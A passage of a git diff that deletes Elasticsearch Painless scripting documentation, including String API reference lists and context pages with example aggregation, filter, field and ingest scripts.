{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/index.asciidoc deleted file mode 100644 index 35610ce0824..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-watcher-transform]] -=== Watcher Transform API - -The following specialized API is available in the Watcher Transform context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/packages.asciidoc deleted file mode 100644 index a220172510b..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-watcher-transform-java-lang"] -=== Watcher Transform API for package java.lang -See the <> for a high-level overview of all packages and classes. 
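Watcher Transform scripts return the value that becomes the new `ctx.payload` for subsequent actions. A hedged sketch that reduces a search payload to the matching ids; the payload shape assumed here is the usual search-input result.

[source,painless]
----
// Hedged sketch of a watcher transform script: replace the payload with
// just the ids of the matching documents and their count.
def ids = [];
for (def hit : ctx.payload.hits.hits) {
  ids.add(hit._id);
}
return [ 'count': ids.size(), 'ids': ids ];
----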
- -[[painless-api-reference-watcher-transform-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-xpack-template/index.asciidoc deleted file mode 100644 index 47035e9bc17..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-xpack-template]] -=== Xpack Template API - -The following specialized API is available in the Xpack Template context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-xpack-template/packages.asciidoc deleted file mode 100644 index ab5d3f78498..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-xpack-template-java-lang"] -=== Xpack Template API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-xpack-template-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-contexts.asciidoc b/docs/painless/painless-contexts.asciidoc deleted file mode 100644 index de3d96a48d1..00000000000 --- a/docs/painless/painless-contexts.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[[painless-contexts]] -== Painless contexts - -A Painless script is evaluated within a context. Each context has values that -are available as local variables, an allowlist that controls the available -classes, and the methods and fields within those classes (API), and -if and what type of value is returned. - -A Painless script is typically executed within one of the contexts in the table -below. Note this is not necessarily a comprehensive list as custom plugins and -specialized code may define new ways to use a Painless script. 
- -[options="header",cols="<1,<1,<1"] -|==== -| Name | Painless Documentation - | Elasticsearch Documentation -| Ingest processor | <> - | {ref}/script-processor.html[Elasticsearch Documentation] -| Update | <> - | {ref}/docs-update.html[Elasticsearch Documentation] -| Update by query | <> - | {ref}/docs-update-by-query.html[Elasticsearch Documentation] -| Reindex | <> - | {ref}/docs-reindex.html[Elasticsearch Documentation] -| Sort | <> - | {ref}/sort-search-results.html[Elasticsearch Documentation] -| Similarity | <> - | {ref}/index-modules-similarity.html[Elasticsearch Documentation] -| Weight | <> - | {ref}/index-modules-similarity.html[Elasticsearch Documentation] -| Score | <> - | {ref}/query-dsl-function-score-query.html[Elasticsearch Documentation] -| Field | <> - | {ref}/search-fields.html#script-fields[Elasticsearch Documentation] -| Filter | <> - | {ref}/query-dsl-script-query.html[Elasticsearch Documentation] -| Minimum should match | <> - | {ref}/query-dsl-terms-set-query.html[Elasticsearch Documentation] -| Metric aggregation initialization | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Metric aggregation map | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Metric aggregation combine | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Metric aggregation reduce | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Bucket script aggregation | <> - | {ref}/search-aggregations-pipeline-bucket-script-aggregation.html[Elasticsearch Documentation] -| Bucket selector aggregation | <> - | {ref}/search-aggregations-pipeline-bucket-selector-aggregation.html[Elasticsearch Documentation] -| Watcher condition | <> - | {ref}/condition-script.html[Elasticsearch Documentation] -| Watcher transform | <> - | {ref}/transform-script.html[Elasticsearch Documentation] -|==== - -include::painless-contexts/index.asciidoc[] diff --git a/docs/painless/painless-contexts/index.asciidoc b/docs/painless/painless-contexts/index.asciidoc deleted file mode 100644 index 11b4c999337..00000000000 --- a/docs/painless/painless-contexts/index.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -include::painless-context-examples.asciidoc[] - -include::painless-ingest-processor-context.asciidoc[] - -include::painless-update-context.asciidoc[] - -include::painless-update-by-query-context.asciidoc[] - -include::painless-reindex-context.asciidoc[] - -include::painless-sort-context.asciidoc[] - -include::painless-similarity-context.asciidoc[] - -include::painless-weight-context.asciidoc[] - -include::painless-score-context.asciidoc[] - -include::painless-field-context.asciidoc[] - -include::painless-filter-context.asciidoc[] - -include::painless-min-should-match-context.asciidoc[] - -include::painless-metric-agg-init-context.asciidoc[] - -include::painless-metric-agg-map-context.asciidoc[] - -include::painless-metric-agg-combine-context.asciidoc[] - -include::painless-metric-agg-reduce-context.asciidoc[] - -include::painless-bucket-script-agg-context.asciidoc[] - -include::painless-bucket-selector-agg-context.asciidoc[] - -include::painless-analysis-predicate-context.asciidoc[] - -include::painless-watcher-condition-context.asciidoc[] - -include::painless-watcher-transform-context.asciidoc[] diff --git a/docs/painless/painless-contexts/painless-analysis-predicate-context.asciidoc 
b/docs/painless/painless-contexts/painless-analysis-predicate-context.asciidoc deleted file mode 100644 index 07914b671e7..00000000000 --- a/docs/painless/painless-contexts/painless-analysis-predicate-context.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[painless-analysis-predicate-context]] -=== Analysis Predicate Context - -Use a Painless script to determine whether or not the current token in an -analysis chain matches a predicate. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`token.term` (`CharSequence`, read-only):: - The characters of the current token - -`token.position` (`int`, read-only):: - The position of the current token - -`token.positionIncrement` (`int`, read-only):: - The position increment of the current token - -`token.positionLength` (`int`, read-only):: - The position length of the current token - -`token.startOffset` (`int`, read-only):: - The start offset of the current token - -`token.endOffset` (`int`, read-only):: - The end offset of the current token - -`token.type` (`String`, read-only):: - The type of the current token - -`token.keyword` (`boolean`, read-only):: - Whether or not the current token is marked as a keyword - -*Return* - -`boolean`:: - Whether or not the current token matches the predicate - -*API* - -The standard <> is available. \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-bucket-script-agg-context.asciidoc b/docs/painless/painless-contexts/painless-bucket-script-agg-context.asciidoc deleted file mode 100644 index b97e3057077..00000000000 --- a/docs/painless/painless-contexts/painless-bucket-script-agg-context.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[[painless-bucket-script-agg-context]] -=== Bucket script aggregation context - -Use a Painless script in an -{ref}/search-aggregations-pipeline-bucket-script-aggregation.html[`bucket_script` pipeline aggregation] -to calculate a value as a result in a bucket. - -==== Variables - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. The parameters - include values defined as part of the `buckets_path`. - -==== Return - -numeric:: - The calculated value as the result. - -==== API - -The standard <> is available. - -==== Example - -To run this example, first follow the steps in <>. - -The Painless context in a `bucket_script` aggregation provides a `params` map. This map contains both -user-specified custom values, as well as the values from other aggregations specified in the `buckets_path` -property. - -This example takes the values from a min and max aggregation, calculates the difference, -and adds the user-specified `base_cost` to the result: - -[source,Painless] --------------------------------------------------- -(params.max - params.min) + params.base_cost --------------------------------------------------- - -Note that the values are extracted from the `params` map. 
In context, the aggregation looks like this: - -[source,console] --------------------------------------------------- -GET /seats/_search -{ - "size": 0, - "aggs": { - "theatres": { - "terms": { - "field": "theatre", - "size": 10 - }, - "aggs": { - "min_cost": { - "min": { - "field": "cost" - } - }, - "max_cost": { - "max": { - "field": "cost" - } - }, - "spread_plus_base": { - "bucket_script": { - "buckets_path": { <1> - "min": "min_cost", - "max": "max_cost" - }, - "script": { - "params": { - "base_cost": 5 <2> - }, - "source": "(params.max - params.min) + params.base_cost" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:seats] - -<1> The `buckets_path` points to two aggregations (`min_cost`, `max_cost`) and adds `min`/`max` variables -to the `params` map -<2> The user-specified `base_cost` is also added to the script's `params` map \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-bucket-selector-agg-context.asciidoc b/docs/painless/painless-contexts/painless-bucket-selector-agg-context.asciidoc deleted file mode 100644 index 13fe69cefae..00000000000 --- a/docs/painless/painless-contexts/painless-bucket-selector-agg-context.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ - -[[painless-bucket-selector-agg-context]] -=== Bucket selector aggregation context - -Use a Painless script in an -{ref}/search-aggregations-pipeline-bucket-selector-aggregation.html[`bucket_selector` aggregation] -to determine if a bucket should be retained or filtered out. - -==== Variables - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. The parameters - include values defined as part of the `buckets_path`. - -==== Return - -boolean:: - True if the bucket should be retained, false if the bucket should be filtered out. - -==== API - - -To run this example, first follow the steps in <>. - -The painless context in a `bucket_selector` aggregation provides a `params` map. This map contains both -user-specified custom values, as well as the values from other aggregations specified in the `buckets_path` -property. - -Unlike some other aggregation contexts, the `bucket_selector` context must return a boolean `true` or `false`. - -This example finds the max of each bucket, adds a user-specified base_cost, and retains all of the -buckets that are greater than `10`. - -[source,Painless] --------------------------------------------------- -params.max + params.base_cost > 10 --------------------------------------------------- - -Note that the values are extracted from the `params` map. The script is in the form of an expression -that returns `true` or `false`. 
In context, the aggregation looks like this: - -[source,console] --------------------------------------------------- -GET /seats/_search -{ - "size": 0, - "aggs": { - "theatres": { - "terms": { - "field": "theatre", - "size": 10 - }, - "aggs": { - "max_cost": { - "max": { - "field": "cost" - } - }, - "filtering_agg": { - "bucket_selector": { - "buckets_path": { <1> - "max": "max_cost" - }, - "script": { - "params": { - "base_cost": 5 <2> - }, - "source": "params.max + params.base_cost > 10" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:seats] - -<1> The `buckets_path` points to the max aggregations (`max_cost`) and adds `max` variables -to the `params` map -<2> The user-specified `base_cost` is also added to the `params` map diff --git a/docs/painless/painless-contexts/painless-context-examples.asciidoc b/docs/painless/painless-contexts/painless-context-examples.asciidoc deleted file mode 100644 index a451b1e89ca..00000000000 --- a/docs/painless/painless-contexts/painless-context-examples.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[painless-context-examples]] -=== Context examples - -To run the examples, index the sample seat data into Elasticsearch. The examples -must be run sequentially to work correctly. - -. Download the -https://download.elastic.co/demos/painless/contexts/seats.json[seat data]. This -data set contains booking information for a collection of plays. Each document -represents a single seat for a play at a particular theater on a specific date -and time. -+ -Each document contains the following fields: -+ -`theatre` ({ref}/keyword.html[`keyword`]):: - The name of the theater the play is in. -`play` ({ref}/text.html[`text`]):: - The name of the play. -`actors` ({ref}/text.html[`text`]):: - A list of actors in the play. -`row` ({ref}/number.html[`integer`]):: - The row of the seat. -`number` ({ref}/number.html[`integer`]):: - The number of the seat within a row. -`cost` ({ref}/number.html[`double`]):: - The cost of the ticket for the seat. -`sold` ({ref}/boolean.html[`boolean`]):: - Whether or not the seat is sold. -`datetime` ({ref}/date.html[`date`]):: - The date and time of the play as a date object. -`date` ({ref}/keyword.html[`keyword`]):: - The date of the play as a keyword. -`time` ({ref}/keyword.html[`keyword`]):: - The time of the play as a keyword. - -. {defguide}/running-elasticsearch.html[Start] Elasticsearch. Note these -examples assume Elasticsearch and Kibana are running locally. To use the Console -editor with a remote Kibana instance, click the settings icon and enter the -Console URL. To submit a cURL request to a remote Elasticsearch instance, edit -the request URL. - -. Create {ref}/mapping.html[mappings] for the sample data: -+ -[source,console] ----- -PUT /seats -{ - "mappings": { - "properties": { - "theatre": { "type": "keyword" }, - "play": { "type": "keyword" }, - "actors": { "type": "text" }, - "row": { "type": "integer" }, - "number": { "type": "integer" }, - "cost": { "type": "double" }, - "sold": { "type": "boolean" }, - "datetime": { "type": "date" }, - "date": { "type": "keyword" }, - "time": { "type": "keyword" } - } - } -} ----- -+ - -. Run the <> -example. This sets up a script ingest processor used on each document as the -seat data is indexed. - -. 
Index the seat data: -+ -[source,js] ----- -curl -XPOST "localhost:9200/seats/_bulk?pipeline=seats" -H "Content-Type: application/x-ndjson" --data-binary "@//seats.json" ----- -// NOTCONSOLE - diff --git a/docs/painless/painless-contexts/painless-field-context.asciidoc b/docs/painless/painless-contexts/painless-field-context.asciidoc deleted file mode 100644 index 71084b11f2f..00000000000 --- a/docs/painless/painless-contexts/painless-field-context.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[painless-field-context]] -=== Field context - -Use a Painless script to create a -{ref}/search-fields.html#script-fields[script field] to return -a customized value for each document in the results of a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the specified document where each field is a - `List` of values. - -{ref}/mapping-source-field.html[`params['_source']`] (`Map`, read-only):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Return* - -`Object`:: - The customized value for each document. - -*API* - -The standard <> is available. - - -*Example* - -To run this example, first follow the steps in -<>. - -You can then use these two example scripts to compute custom information -for each search hit and output it to two new fields. - -The first script gets the doc value for the `datetime` field and calls -the `getDayOfWeek` function to determine the corresponding day of the week. - -[source,Painless] ----- -doc['datetime'].value.getDayOfWeek(); ----- - -The second script calculates the number of actors. Actors' names are stored -as a text array in the `actors` field. - -[source,Painless] ----- -params['_source']['actors'].length; <1> ----- - -<1> By default, doc values are not available for text fields. However, - you can still calculate the number of actors by extracting actors - from `_source`. Note that `params['_source']['actors']` is a list. - - -Submit the following request: - -[source,console] ----- -GET seats/_search -{ - "query": { - "match_all": {} - }, - "script_fields": { - "day-of-week": { - "script": { - "source": "doc['datetime'].value.getDayOfWeek()" - } - }, - "number-of-actors": { - "script": { - "source": "params['_source']['actors'].length" - } - } - } -} ----- -// TEST[skip: requires setup from other pages] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-filter-context.asciidoc b/docs/painless/painless-contexts/painless-filter-context.asciidoc deleted file mode 100644 index 65773cd9008..00000000000 --- a/docs/painless/painless-contexts/painless-filter-context.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[painless-filter-context]] -=== Filter context - -Use a Painless script as a {ref}/query-dsl-script-query.html[filter] in a -query to include and exclude documents. - - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the current document where each field is a - `List` of values. - -*Return* - -`boolean`:: - Return `true` if the current document should be returned as a result of - the query, and `false` otherwise. - - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -This script finds all unsold documents that cost less than $18. 
- -[source,Painless] ----- -doc['sold'].value == false && doc['cost'].value < 18 ----- - -Defining cost as a script parameter enables the cost to be configured -in the script query request. For example, the following request finds -all available theatre seats for evening performances that are under $18. - -[source,console] ----- -GET seats/_search -{ - "query": { - "bool": { - "filter": { - "script": { - "script": { - "source": "doc['sold'].value == false && doc['cost'].value < params.cost", - "params": { - "cost": 18 - } - } - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-ingest-processor-context.asciidoc b/docs/painless/painless-contexts/painless-ingest-processor-context.asciidoc deleted file mode 100644 index db0e365c02e..00000000000 --- a/docs/painless/painless-contexts/painless-ingest-processor-context.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[painless-ingest-processor-context]] -=== Ingest processor context - -Use a Painless script in an {ref}/script-processor.html[ingest processor] -to modify documents upon insertion. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`):: - The type of document within an index. - -`ctx` (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - that are part of the document. - -*Side Effects* - -{ref}/mapping-index-field.html[`ctx['_index']`]:: - Modify this to change the destination index for the current document. - -{ref}/mapping-type-field.html[`ctx['_type']`]:: - Modify this to change the type for the current document. - -`ctx` (`Map`):: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -void:: - No expected return value. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The seat data contains: - -* A date in the format `YYYY-MM-DD` where the second digit of both month and day - is optional. -* A time in the format HH:MM* where the second digit of both hours and minutes - is optional. The star (*) represents either the `String` `AM` or `PM`. - -The following ingest script processes the date and time `Strings` and stores the -result in a `datetime` field. - -[source,Painless] ----- -String[] dateSplit = ctx.date.splitOnToken("-"); <1> -String year = dateSplit[0].trim(); -String month = dateSplit[1].trim(); - -if (month.length() == 1) { <2> - month = "0" + month; -} - -String day = dateSplit[2].trim(); - -if (day.length() == 1) { <3> - day = "0" + day; -} - -boolean pm = ctx.time.substring(ctx.time.length() - 2).equals("PM"); <4> -String[] timeSplit = ctx.time.substring(0, - ctx.time.length() - 2).splitOnToken(":"); <5> -int hours = Integer.parseInt(timeSplit[0].trim()); -int minutes = Integer.parseInt(timeSplit[1].trim()); - -if (pm) { <6> - hours += 12; -} - -String dts = year + "-" + month + "-" + day + "T" + - (hours < 10 ? "0" + hours : "" + hours) + ":" + - (minutes < 10 ? 
